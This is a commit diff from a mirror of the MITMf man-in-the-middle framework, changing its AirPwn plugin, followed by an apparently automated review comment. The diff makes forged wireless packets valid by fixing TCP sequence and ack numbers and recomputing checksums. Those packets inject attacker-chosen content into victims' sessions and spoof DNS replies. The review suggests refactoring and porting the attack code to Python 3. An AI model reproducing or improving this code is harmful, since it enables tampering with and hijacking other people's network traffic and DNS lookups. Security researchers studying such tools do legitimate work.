mirror of
https://github.com/byt3bl33d3r/MITMf.git
airpwn plugin now calculates correct seq, ack and checksums
parent
51a4b65e26
commit
76fd67d245
1 changed files with 20 additions and 0 deletions
|
@ -74,11 +74,21 @@ class AirPwn(Plugin):
|
||||||
response.src, response.dst = packet.dst, packet.src
|
response.src, response.dst = packet.dst, packet.src
|
||||||
# Switch the ports
|
# Switch the ports
|
||||||
response.sport, response.dport = packet.dport, packet.sport
|
response.sport, response.dport = packet.dport, packet.sport
|
||||||
|
# Switch sequence and ack
|
||||||
|
response[TCP].seq = packet[TCP].ack
|
||||||
# Inject our data
|
# Inject our data
|
||||||
response[Raw].load = open(rule[1]['response'], 'rb').read()
|
response[Raw].load = open(rule[1]['response'], 'rb').read()
|
||||||
|
# Calculate new ack
|
||||||
|
response[TCP].ack = packet[TCP].seq + len(response[Raw].load)
|
||||||
|
#delete packet checksums
|
||||||
|
del response[IP].chksum
|
||||||
|
del response[TCP].chksum
|
||||||
|
#Some scapy-fu to re-calculate all checksums
|
||||||
|
response = response.__class__(str(response))
|
||||||
# Send the packet
|
# Send the packet
|
||||||
sendp(response, iface=self.mon_interface, verbose=False)
|
sendp(response, iface=self.mon_interface, verbose=False)
|
||||||
logging.info("%s >> Replaced content" % response.src)
|
logging.info("%s >> Replaced content" % response.src)
|
||||||
|
|
||||||
elif 'ignore' not in rule[1].keys():
|
elif 'ignore' not in rule[1].keys():
|
||||||
if (re.search(rule[1]['match'], packet[Raw].load)):
|
if (re.search(rule[1]['match'], packet[Raw].load)):
|
||||||
response = packet.copy()
|
response = packet.copy()
|
||||||
|
@ -86,7 +96,12 @@ class AirPwn(Plugin):
|
||||||
response.addr1, response.addr2 = packet.addr2, packet.addr1
|
response.addr1, response.addr2 = packet.addr2, packet.addr1
|
||||||
response.src, response.dst = packet.dst, packet.src
|
response.src, response.dst = packet.dst, packet.src
|
||||||
response.sport, response.dport = packet.dport, packet.sport
|
response.sport, response.dport = packet.dport, packet.sport
|
||||||
|
response[TCP].seq = packet[TCP].ack
|
||||||
response[Raw].load = open(rule[1]['response'], 'rb').read()
|
response[Raw].load = open(rule[1]['response'], 'rb').read()
|
||||||
|
response[TCP].ack = packet[TCP].seq + len(response[Raw].load)
|
||||||
|
del response[IP].chksum
|
||||||
|
del response[TCP].chksum
|
||||||
|
response = response.__class__(str(response))
|
||||||
sendp(response, iface=self.mon_interface, verbose=False)
|
sendp(response, iface=self.mon_interface, verbose=False)
|
||||||
logging.info("%s >> Replaced content" % response.src)
|
logging.info("%s >> Replaced content" % response.src)
|
||||||
|
|
||||||
|
@ -110,6 +125,11 @@ class AirPwn(Plugin):
|
||||||
rdata = self.dnspwn
|
rdata = self.dnspwn
|
||||||
)
|
)
|
||||||
|
|
||||||
|
del response[IP].chksum
|
||||||
|
del response[UDP].chksum
|
||||||
|
del response[UDP].len
|
||||||
|
response = response.__class__(str(response))
|
||||||
|
|
||||||
sendp(response, iface=self.mon_interface, verbose=False)
|
sendp(response, iface=self.mon_interface, verbose=False)
|
||||||
logging.info("%s >> Spoofed DNS for %s" % (response.src, req_domain))
|
logging.info("%s >> Spoofed DNS for %s" % (response.src, req_domain))
|
||||||
|
|
||||||
|
|
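Review bot: The seq/ack assignment and checksum reset are pasted into both TCP branches (the hunks at -74 and -86), with a third UDP variant in the DNS hunk at -110, so the three copies can drift apart. A small private helper that deletes the length and checksum fields and re-parses the packet would keep them in step. The re-parse `response.__class__(str(response))` depends on Python 2, where `str()` of a packet yields its wire bytes; `response.__class__(bytes(response))` behaves the same there and stays correct under Python 3. The second TCP hunk also omits the explanatory comments that the first one carries (`# Switch sequence and ack`, `# Calculate new ack`), which makes the two branches harder to compare. The enclosing method starts and ends outside these hunks.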